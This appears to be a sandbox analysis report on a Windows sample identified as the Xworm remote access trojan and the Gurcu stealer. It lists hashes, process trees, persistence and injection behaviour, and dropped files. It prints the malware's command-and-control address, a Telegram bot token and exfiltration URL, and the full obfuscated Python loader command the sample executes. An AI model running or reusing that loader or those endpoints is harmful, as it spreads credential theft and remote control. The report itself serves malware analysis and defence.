gurcu | bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db

Analysis

max time kernel
146s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-12-2024 03:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe
Size

68.0MB
MD5

d57adb24b010d644315933e7030cbdbc
SHA1

6d2c83ce9d75b3e1da11c3fbc1b25fdc3944537b
SHA256

bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db
SHA512

62013bbf6803465736c4b2604464a896b6e7f9f712435873de080b7536839e849e7967b767a6f165225312f4bc809d97e824363939c65e7696611088d190e34b
SSDEEP

1572864:1Laqinl9atVfhVStFs93Vl7BzSh5fVpg88N5/Tud5AU3G86TQMr:1mveHfhVSTs93Vl7BehhHghzU3Jc

Score

10^/10

gurcu xworm discovery rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

103.232.55.173:7777

Mutex

6KOgubdg2DSGnIiN

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7898406264:AAEcJvD5oP4JuBuf3i4snVJp7o4fDp7tsuw

aes.plain

Extracted

Family

gurcu

https://api.telegram.org/bot7898406264:AAEcJvD5oP4JuBuf3i4snVJp7o4fDp7tsuw/sendMessage?chat_id=-1002292872097

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4208-2470-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.lnk	pw.exe

Executes dropped EXE 2 IoCs

pid	Process
5028	pw.exe
1564	olx.exe

Loads dropped DLL 50 IoCs

pid	Process
4320	bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
5028	pw.exe
1564	olx.exe
1564	olx.exe
1564	olx.exe
1564	olx.exe
1564	olx.exe
1564	olx.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1564 set thread context of 4208	1564	olx.exe	92

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
968	vlc.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4208	AddInProcess32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
968	vlc.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: 33	2696	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2696	AUDIODG.EXE
Token: 33	968	vlc.exe
Token: SeIncBasePriorityPrivilege	968	vlc.exe
Token: SeDebugPrivilege	4208	AddInProcess32.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe

Suspicious use of SendNotifyMessage 8 IoCs

pid	Process
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
968	vlc.exe
968	vlc.exe
968	vlc.exe
968	vlc.exe
4208	AddInProcess32.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 4320 wrote to memory of 1832	4320	bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe	84
PID 4320 wrote to memory of 1832	4320	bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe	84
PID 1832 wrote to memory of 968	1832	cmd.exe	85
PID 1832 wrote to memory of 968	1832	cmd.exe	85
PID 4320 wrote to memory of 5028	4320	bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe	88
PID 4320 wrote to memory of 5028	4320	bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe	88
PID 4320 wrote to memory of 5028	4320	bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe	88
PID 4320 wrote to memory of 1564	4320	bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe	90
PID 4320 wrote to memory of 1564	4320	bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe	90
PID 1564 wrote to memory of 4208	1564	olx.exe	92
PID 1564 wrote to memory of 4208	1564	olx.exe	92
PID 1564 wrote to memory of 4208	1564	olx.exe	92
PID 1564 wrote to memory of 4208	1564	olx.exe	92
PID 1564 wrote to memory of 4208	1564	olx.exe	92
PID 1564 wrote to memory of 4208	1564	olx.exe	92
PID 1564 wrote to memory of 4208	1564	olx.exe	92
PID 1564 wrote to memory of 4208	1564	olx.exe	92

C:\Users\Admin\AppData\Local\Temp\bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe
"C:\Users\Admin\AppData\Local\Temp\bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4320
- C:\Windows\system32\cmd.exe
  "cmd" /C start C:\Users\Admin\AppData\Roaming\marke.mp4
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\Program Files\VideoLAN\VLC\vlc.exe
    "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\marke.mp4"
    3⤵
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:968
- C:\recover\pw\pw.exe
  "C:/recover/pw/pw.exe" -c exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode('c$|ee*>>VcmTX?q>0Byn&8+IKa(iiGw{s)`PJFxr5+FbrEg^_AZKtG=5okdOVHRV*WY6h-nTPp<s>l9|`GWZX{-Azgo+czaJFD}YnSrCYHzIB<ca4avMLzo_@OOs4ffJ2HPy|J-2z-E17!6?z#zGi}@en3pB7_TYA%u%?F@#HSDTK>#IfPH(lMt@Jl@LCKPeZs0S3~#=KEp6(J-1)L7tvtNxD~Ts!j~bQu)eTg!B_T|@XN5iV0~qO4ZjZYMe7^;Tlj5=FInH&ui<O^4SZvN55EuFmaQM`-@)I7_!H~*_K)z#5MQx=ve)36{Rj95dmXOZ8*szkgqvaCQ)|oqBmASi4Y%ziOyagxeFr_$cdirYIePJz1l&b0(HDP-z(1i^=t~Uu&{ybd4Bw(}(6<==3;GVd#*olsKfgq8eu+X7eUE;?EtF26-|6Is7)<Gup862QvqyzU^7p?68sL)A`4^g}E53fE^&Cgn{7%oojZf75G}5&m(vz`yVqhrb{Hd#&=$g7RY(>Kqi3`OyFkE~ji_hcdv@lN;XdyLUxv1m?@~VDLUtp3rFPvlWD(_8PUvgZp=i`M6imxOW=8L0_gDh*lpiVsfdj9p}ZiY@LnD$B?USI3pe97%~93LZ3<ub=eTwZKl(0I*-f?Ved^94CyI_KvJsmzJ<m4|^7UmwgDJ>4IAju!om*#&qUfBC@lR&e1*evZx}zhJTaJ<0|APOXkQUkMnqT~8kjl2Pv~O!xPQ_Zox$UOpQ5UdL&lc;DgbvtXJSE>@ypU5ou@ttI>|e_ZRo!nOP;ihjWVyBLby#oLj)#6wFV^5-A#7H08TY_{+^@@-@moh|sW8SeQe64VifcR_Fbb>x9277O4}P>UZ$`p;1;5xHByG!Z=4+q=ct0*XJ5`^~)n-#oL#&+*yfEcVd%K=&}}b>tjNDH`dg{lqNsAuyu^_iG?eFW~jpK(JV&39B>k=L??VwDo!1(w+ID;<~zn0v%(eB$wt1gq1&!oBCuP73R_IJl-4n^Jr(D&<w>3rTkF5!Nol8Y3Ub%0E60UG=cxCv7e$pM3<w>vDN6y=$q&U#=Yd{(qDM|Lg}Y*F$=@Xzr|ih?qV3nK_<lGexw_nMRAF_MzMd7-z7pR!~>g1#<^c#2AoCb3r^3`^kl+Y3b*Cxqxo{JUZAh&^X7aB+e={J$p!BZ!PeJ<VmBaM(K@c7d%iyQ=Zg>c=PW)|^ug8R1V0A5T@G1YjlPOvvm!rdEcO^Z;~%BsNB$bQ#%6?Ke_8giF$d-p7+JXef3p7gqg8$x4Bfy*8%yQS&;K=chb?jz`&%TC!`~tw9`*env3^W=*eUjcU~AaxVs8oWkHNO1>ffUejDBKe<tWg9;5sLpA6;W3GW~Yk^WGj=Jx#F&CvQK|BxBxMFzku$3~k-RzK>fz2{4>D{mB&YEE^wZeG~QGeJ+{!Z&m*0(YgH?R%Y}U{0~_CIq~4^-Z!DWdQXDc{}dD};r=_e+w=S@Y@FWPkl%1SIR1H^n;<j=R=eU2l&k+ml|k2|Dgz-60!6(H)Oh&$W}iiV6N#pgPm$;@hCM%qV+6Lre^_h+;~y<{!H>@pI5xzvmj_2+ENorEcnrlud>P|$lnC)B*k2cBPcZe0zc5>wEo1Ddzc_n3Tf*4tY!#cy0_S}n@URnj@=rlQ1k5kZ7gc4T@2ByRkj*^A`Y_Ce+=P}HDj{^f<g@vg0d+QWr8@y7x(XfrMIe&jitok8$oi4uIi?Q;_Obp&Fyd2NFy>j{BL8Tbui`1xj`P^LghRvwf(_&W3CP27LCdFc&jQL%)#s0zdR+K(Wj;41s@Fju^%)3f5OBW|TgEYHHM$ZHoHT&JKN0h4xKsI0?7dZi@T&ru=Ox67otz*MbX#Ir7MP603%M!}Oh2S)xSSwaj7BqT!(?&-!Q~_g<Z3dR23?kHHC;|AF#wUkhjykbo9PViSagLN4*|oq8nWcI%*=%%wMj`%XX<j=QwwY_Z*jEJMNXq>$pT=YUL2=1k;QX!4XF!?b&$&_UC^i!mR+T|6rVDQ7T{Z4f#DUJt?(u2)ktojqyR5ChAedav~Efj8KAtzuskp3T*(GDUu0!yBAYY)fkZManxeAqSPi|Pk<erZttOY(^9SR4;hYk?$c8Dl!8_(y1Xf<Qa<wYi$Vel%#L0{xF}aCW(lRYF2U=6BtT{}+MfE7&Bn`dWN};^pln8?mi-WXCv<SY7Xx@UnC}jk$YvdcE(d7zONtgUe!$gI=4GW^2zTp{O;JaL^C1lf$X^YZL1UcHW)h>M_SX@&tjxr6YeN#=Hk9gbi0cE9mi<RVVj*|hyR;FBCV{%p_#axJVyMkp*2ozsYi@w7FnpAAd5Ny8>Fu%GD#D;k=5G{7fTf8CxX)Koz%hL?skl36`Sowy8dNqJ5f^;zAY-!RUp{<QvTLOTsF$Te#%v1x`1X?^%vv{vUv~Ls&W%!~|l^jlyD7U7Gz^()KLN^a6v00|%66YYm0G=54>msby3LKUp2lD19RiSuC07go17?~q9LM^eRK#yICAakO{b=4*^)k5xq7h#brvCZn_zyhL~#$%Y8l!1cHw^~?pfMg3biB$mEtH@1Yh*Q{9>2X;ul+!K8;*iCaWI9t8K#t)}APE%H2aJ(wb+V(HgT|uFR$FqW)F1$bOs>wG?f^<gy=5{JPy|yfgSsTqX;oy0I&DmO$%48KWkjJVZ<AF`<nxf>%19cdI3m;FNYF)HtFGYjb<wCo!gaW5dn$JMsnlfm715a1OmmvIT}K9-iySc2WY`7tnB_?XTBJ$vDVS1C&Jpc{8l;(Ky;++=hY>_uB1OD+v56WW)gvpZTpl`nN3fv6Q@kuowMv~HkGKMuC<N!o*k?J0<urRR;R~2Qf@^A1&ev%uX;j;jZKJP{uwS9lo-DDVLXjn@nd4vy>yk1GxP8hM$+FaT71_4x*yoB3*=;H$VzefzNERw+AlHQ=mx9D-1WBVKTbv-5+&(Ju8I^J;Jg}+&`$0?M@g%6H+nK6l^Ch0<yu8yO5s|TFnw%&SM~X!Y>rxv_l0Oj`x5*KZl4-*fB`XD|G$8>Nf+^x)lN;427w_3k@gnjRlPo~eVj5!G69~G}AQ__8WvaZzw73#itr2ivBoW)P%2d6;_<}sHa3ZRTB}U|B-;zr?50dOiuy`L43|(j3u0{hKr(j+ywx=qQ9r5QbEty6Ml(Y#Tty*nzPy{l{X|_=k0i;xd%qx^ea+KSL1*@W^_=zOK0gw)q8f9Im4jAwN04W7rNM{V8%hWa7?dH4KcDp<co2`j#vo*e3Bjw__!aF!VNJx>2T&rHlbv58BHL*pia;5;JK(|a@%^xt>PHaVlQ<-sX%>nyZj*3F{DwSz2$4Qxe{OS^04g*z_$*2~OeXDoFQT|k<5v2sSP~uA*#d|`5ovOvLsMzL2Vj9>+NfY}|g~MyhG(SRed4fi6QKLXcYq|{}`+d1&kf4~IDxHIrKxJGh<tn<(<P`=QDxGn0%#vDNkQRv6l$R~OX5yGFvUyc1Pld@KBXq5)M7X8AV`jvZF;?jsQK7hEgRmg586MazN+p?U!$v$`l1M08RLdOqbjFxKn(a2k+!&I~NF#``E|I2C08n*ulm>VY+H^$)wJ|9ADS<Yqnq%dpt}zDY;6^aHh6oG^w+W(zW0r(%yxSnPj$eQlkZTj4Xqj%eMvwivlxgyXTuzk_Jl$rSwMH+a)650-eG)ouO)$+HmBe;STB#Osfa?ciq031Po2OMOGvsXF7Npv=Wpa5%hJ4L7G6Fz8UZaQzh+{n9G?}dDP1Mnu9D!{=k9ne@g*t+W&pO(;kZ49|rSMvyJ;gD$ieny>WDZIM!-z#g<SEn_i~K$)SwkGZtGr}PY9%CtlvJsSOhFMFo*?@zzQ{4U$c$SP->Q{>0qi!(SveaKJwmoQ9(1|B3L0t9v>=Y7eYIfF5}m0xaGaAFw%KTMP%M&^c#eIu#3{PT-GCD6s}9fO^TMlH$Zw@`RZw7Mu3*%~f;Pc+;WcC<#Yt`-6d?rN+(0k&Quuw{<YevOqS1S}b4Z}h=l`!e$?@?&JsK7s-y7jYmBK}E5w#+B(GUi=>gdn0@ZyRemchfxPke~{5(}PDA0k1H179#>T=+`F55y%~@dk#1-~9f>#gFs_tEZsBe3cnGVg5nHt@EX})l>0XA-Mpb2hYZ<@Kqn)(YWAxRuAvmVPjA2>Y5K%^|7W8G37O$=ktr)qBnFL-79>2TLl;L=fS013@&Vc#SCg2XUP_MU1{$(z{%`<?~FTH<BPg1%UtQ8w>c%nPO`F7CXds{$^iL?mNU-jQdfDuP7eC(w{HI8UAb{B;Mkt*oKr=<bhDE^Ub7t0@5&vjQKHlI?XlO+kGB=-UB;MJGnIXBSUoM$w>ORI?RXQP)^~KL+GIN-Ctc{ucxQw1F4;q~b97(bIeQP@ukRlZ_tu)@d~%Y^n8sQCqMCiT!OScoS-sr8mKgm&=p4K|RLfrfR%rqx)~|T3GQG<b%U0Q;+s#{_KyB^Dm|mA}2Dg^6cMU7jFjFs|wA}04PRS!Tw;P>VU%V+$?E50%b2JpQWnf)2)bWTksCT=AoiiHBM_XEEn_*8z?=JPrBD=d^INz?_A00KD8xvH^Tc_RA<k36&m{>P%vlF*{-WP<kqtTdW_d#~->9lu%uB%tO8UN;-U#m9@d2v&?NuE<^&oOVE^9e~?@5YAhg2^B`6`{_Q_f*^NbKNz)bEe!%buTj$*kn^~k@w~OE#>xzza4EIUepe9+k15{dClYp)+H(Db+B8X_Gj(m-D4+fb~}S(tGwx*_ggm}C*;}F{R-VK4@~3mtUTUrfbH#M3J(0^J1W&Y9gVh!@V$iwD1TohE-tq>hsKTWbuZ5)RUQ?OuMRl0HLMnj<n>8<dZrGDgJ~~SrgzfS;kKl2()awj%AR!!JJs!b6<u#Cn?9=z`OY59U0u|QIpkgK?AN@(@%7#~dsi{m8^*TMmy4`WQztv;TJ`<?)op$4{kY5Rc85FLTiHXCEvkig>wPIXD)5%?<kreAB91Pn{hf}k@l{c_F6@@B9-MO-cT18Eb36XtVT#zSSBK)@sH&2)p(`KDz_a_AR)+N}Gthh|=yyft=Axx-$Zn0U9d{4!%A&}skhmbGW8X_@>ub&46x2@Et4yP`cJ3c-qS-F?+<R?n{Z!cZTJMj*;h5CGa5KB56xpNR{?%bol26MgS?25%5nGL&Qc|nc+hW1ti7GhRxX{kdPWaaGk$!YL>BII-fz3|dQ}raTRtK58k>9>_H+gR3x+ZKlbTyS-YqmPawzN|}*D8a4FTYcU*T<XF_MIje)81^Wvpu2L&$t8NzHeOLUG5L3Lu+lfdRs_c37e-kH|mv$)YF@KZE{_ZS{ugwy0q!-Z)H<w`I~I^J!Ov(a`$?pvC(A*#~qf>uetZV%XMLRa@jc&o4bRfnUTF~U)E}e8|Ddg(wl|jop<}&wBWR^RkD*TtM%QTd`VS=UGMZVZI#~N^=_4QVHeg?RXCiOW#ROwE!-Vgx3{??e{{chnJyOmv$5LW*YfEh;U4S_jSaenk90+;XqWk{DW}%Q-01#TwwShb*{1HccaPqcJEv{!thZh2T~ntQvU+f55a{r<PF^2%dlxydwU<ktTF2GHZ2Fe+hwJO7h2Hta&1nVg3Widu>&NQkNFx|%4|~PC&f!MsezKooOOU7-bYtUwj~?f<X>ph>Ii-vHTv^WbXA<_9$+cBo>uIi!My>7Bn^C3HD|xp}L-XF3io$-m!WVP9x2?+NcIv*6N+0`Zl9Nv=hif~Bm2B~3GCIunsKWl<@QM`+TW;3g$!4bG9q(p)C+qshbTU1U^#(A}9rPUU1P5ohH0WC$Ur)isfid(u7F_o9{!kzIm?}6V<}pu)OVf^f-Ldp}tkZ+b_?XcBj;+rVLAH9nG8n3^*VFXD!233s^2tb72R+TyeJ?oXyjZx7p$rVGqk2I~#!G}vuHuJH!2t-rb0^BcA>Rgvj`kMm-rL7~h_@IVG0(#McJFQeAuSXn*}UMW2@_27myf*{L)GeN6@3zBo8Zc*<D{rCx!^qw4=OD@6us48WRM{8o(Dyc|MY@1Bz*Be@D>kzp!_1}dKDBwPA|-+J!EK-|D2%-6E;D9!aE3x;NY7l!u@|bD?c5W%SUz(4K4j75YQk<e7Ipk@@1Is_$n-a!0=UUIkx<Ad0{!e9AA0899>yhjr|WeX=~>'))))
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5028
- C:\recover\olx.exe
  "C:\recover\olx.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4208

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4b8 0x500
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\marke.mp4

Filesize
9.5MB

MD5
4e32465790161b71dd4487b71aa035e1

SHA1
1e89992d2490272d85aa995f36b704b357e084f4

SHA256
3d658d650fc530303c972b221c328e0af574385438856204eea1f34181fb4c41

SHA512
82ccb4c22fe2589caf343832b84d63e39650a143552ec60c2dd181a551fe538cb2f026505e700ca35fa205da4a4af0660d91c85560c6f7262cc09be6259ab56a

Download Submit
C:\recover\olx.exe

Filesize
39KB

MD5
8aee66fe642d154f32e5aff380da188b

SHA1
ff19985b61265c3fba572baee6ec5ef21221502c

SHA256
94c5e2fbf60bbabf8e026178ed50d0e56c31b274300bd633c050ffdcb1f4510f

SHA512
2ea08ce90e85c406f1326b70cf434bc73b4798f0e9b797806852a11fa14d20bebc37b953b4adbc4aeae8e319682e1732885da75186214a6880b17222ccd6b5c7

Download Submit
C:\recover\pw\Lib\site-packages\pyasn1\codec\__init__.py

Filesize
59B

MD5
0fc1b4d3e705f5c110975b1b90d43670

SHA1
14a9b683b19e8d7d9cb25262cdefcb72109b5569

SHA256
1040e52584b5ef6107dfd19489d37ff056e435c598f4e555f1edf4015e7ca67d

SHA512
8a147c06c8b0a960c9a3fa6da3b30a3b18d3612af9c663ee24c8d2066f45419a2ff4aa3a636606232eca12d7faef3da0cbbd3670a2d72a3281544e1c0b8edf81

Download Submit
C:\recover\pw\Lib\site-packages\win32comext\internet\__init__.py

Filesize
135B

MD5
f45c606ffc55fd2f41f42012d917bce9

SHA1
ca93419cc53fb4efef251483abe766da4b8e2dfd

SHA256
f0bb50af1caea5b284bd463e5938229e7d22cc610b2d767ee1778e92a85849b4

SHA512
ba7bebe62a6c2216e68e2d484c098662ba3d5217b39a3156b30e776d2bb3cf5d4f31dcdc48a2eb99bc5d80fffe388b212ec707b7d10b48df601430a07608fd46

Download Submit
C:\recover\pw\lib\__pycache__\_collections_abc.cpython-310.pyc

Filesize
32KB

MD5
a5fccb9039d1db76a1cc23188c27d4e4

SHA1
9aa81b2d4fc4a223892f200f0870b139d617b05c

SHA256
212105333f705cc28720d63653fb5dc6f0d4f20ea9678d21ada19517fc2e562d

SHA512
b91c17c35553b34fedd4a7c399910bbe1d18d1e2f606abb10ea4c147d1d33d3ee034b6ed0bc2a9481d85278dbf7e4873a603f59b2e4f0a4c1db2ca57b7f9f23c

Download Submit
C:\recover\pw\lib\__pycache__\_sitebuiltins.cpython-310.pyc

Filesize
3KB

MD5
329f1c7d934d9672da7d779af0be32fe

SHA1
339d24b012343341d598916bd162da55d40cadc3

SHA256
542d490d87b00aa55793177d8b19d621622e79919c07427091dcb3ce6fbca330

SHA512
6352eccfac84e731daa5451573e010195641959af21589a31ea885887461d69cc6028525689c6512b3b8ff22e391354e10c3126b1e7d002cef41cfaaaccf67b7

Download Submit
C:\recover\pw\lib\__pycache__\abc.cpython-310.pyc

Filesize
6KB

MD5
a9bb1a640d95da0b2d336f8a8d903aeb

SHA1
6d895961a960a40d9c2092ac5855266a74f74041

SHA256
5761eed8be9758a6a2ac3f152144c80cf7f2f5bccdec2e0b95d734b32b6d9559

SHA512
b729be8540693c8c27e857ac5b764bacd89a6350bc740ce4d866bbb84e7af55fa76c87e6d827bfe54ba8ae6f3322ca3dc2e35940cdc6f9cdeb3cd55f95737624

Download Submit
C:\recover\pw\lib\__pycache__\base64.cpython-310.pyc

Filesize
16KB

MD5
ec5e0c7f1e65f981535d845da61d8868

SHA1
814eb61ed26fd439a39ee81705f9df9883532e4f

SHA256
996d1aa11341e5831e8087595071b06f29e712b17dca8cf8d9b429b89a2081c9

SHA512
0ed6a7c40f2ba168d81d3186b915f6b1af2c4021cda0d1462960f0775da9e46e67a901f6811dca82a5a10561182409d22e90bb5f334bed2c3a55b0fc5796782d

Download Submit
C:\recover\pw\lib\__pycache__\codecs.cpython-310.pyc

Filesize
32KB

MD5
c10813469f5613f78fa5307f69560cb5

SHA1
75e170688a3008df29fb1916e755c774cecf3220

SHA256
b8cfe3a453cac3690774a0019b2fdf3c7b18b7b66a8af95bd054005d7910a922

SHA512
f0ed7607a673361315d71febf8277a6ec2a7470e977f00d73a354abbf7c4f2dbce4d85bd5dff075836bda78ff4b05d06bd9b8812995c911b0572c0c464168b82

Download Submit
C:\recover\pw\lib\__pycache__\enum.cpython-310.pyc

Filesize
25KB

MD5
336d1c05bedb25acd31e8ddd2f575206

SHA1
2fb8f3fb746106b800bdc4dad936352eb0bac16b

SHA256
4a1e3fda38f242f1ac5209f01a8871a647ffb6dab1076e88ace7442dc2237f29

SHA512
95c93c920c12d1509a26e12c22b7fdebc5fc7245ea5333200945694dc3006f0d633240209d11feb1ac5e633f059966491aa039c4da63aa073e2b0ab40a61f8fb

Download Submit
C:\recover\pw\lib\__pycache__\functools.cpython-310.pyc

Filesize
27KB

MD5
e68268ff70e72fa3b2a49e583f801cb6

SHA1
be0e53f43a532a1ae3e0908ecdd9ee37052f79fb

SHA256
49345f4fff391a76fa94c46f8b4cb7dfa553b621484857aca0978efe348aeed1

SHA512
79330ebbe78f19a9f3b28b238b230226e9dcdfeeae04074b8f3a419ef5020c8bd7b80dece85b9b209a2fffe7afd955f0b1e7f3d45759ad236c16ef56417c4bf5

Download Submit
C:\recover\pw\lib\__pycache__\genericpath.cpython-310.pyc

Filesize
3KB

MD5
fd334754d2842a9f3699366539842040

SHA1
2b3e4355e55b9c05ca7c461d2b46c32e68cb1eff

SHA256
1f8601e31fe4769cf8f579dca2ef490b25fe87ad77ce5485ea35eac302f503d6

SHA512
de6930d0c06eff98f746f28a30a88dc2a1800a7b7a7566b17268a8be5bccda0a2eb176c33d778fcdb1ab2926269ddfd82db8d415a520b7e9b28ee87b86fd8999

Download Submit
C:\recover\pw\lib\__pycache__\io.cpython-310.pyc

Filesize
3KB

MD5
840f1871eb2d534eddb8cfa752ece47b

SHA1
8dfd4ebf94a9e5cb8dde052a832d862034067d24

SHA256
013a4365a6320c41a25a09664ea2c925b37b927c6ddc024109367a3f548e56f6

SHA512
fe630e4b1054f916d9cce2b2ea5fac2ca6e29f43f9942b0e5f898c598a63b9cedc8c652a316293513622179b4ac2aeee96046e0e54f5756f2731b232839db6b0

Download Submit
C:\recover\pw\lib\__pycache__\keyword.cpython-310.pyc

Filesize
924B

MD5
f1a3d2f57987c67641056507585d6001

SHA1
3322ad5196c642940eeaa9bd54dd947c86e8a007

SHA256
cc6275fd77261e7293d5377c4ea96955e05f81c9ab48f70e87d038505997479f

SHA512
2fecb7a4f0a4a17f35addfe9659a74d44f117aca88916b03b720503198d5c294579859005a4eb0dc425beb9f1438c71baabf53bfe8298c60f22f8978d54c10b6

Download Submit
C:\recover\pw\lib\__pycache__\ntpath.cpython-310.pyc

Filesize
14KB

MD5
6484d0635232c9bd18bdd617f73ae741

SHA1
7c430a3c224c25c38461f2f93503a4ede69de2b8

SHA256
c80e34c532f84337b51a53b0e0cb3ac55acc5ce3669d800f75ac52272f75f0e3

SHA512
e85c25c664b08efe53c9870043efbea07a1c52bda65d1aebb21a032cc5312a894fc18958075efccdced6502933d08d62523e331c693d43a7dff5333e2c8453ef

Download Submit
C:\recover\pw\lib\__pycache__\operator.cpython-310.pyc

Filesize
13KB

MD5
081e914bf51fde140827823bf3d0d348

SHA1
31ba6d691b26d39be2574fdf17a17fc0bc4d2a62

SHA256
97bcded1739fecd6d7d1fbf15b3ee807b18944b30ad7ded31fa7240f856a860d

SHA512
0d6a7a0a292d264a073408ec9d4216739b679182e4a7a975ae39efc618429ab64992a3478d818ecfe6f3b90bac5ffd90e6148df566697398e988f24cec516440

Download Submit
C:\recover\pw\lib\__pycache__\os.cpython-310.pyc

Filesize
30KB

MD5
290a74acfd933918495f2e60320499f3

SHA1
da534bbeb1b44e6149bda3e7530644e617e00c46

SHA256
2cca3cbc5b6f449240c20cf7fa9bfe453d29f86dfd60230028d7e08422aa4e2c

SHA512
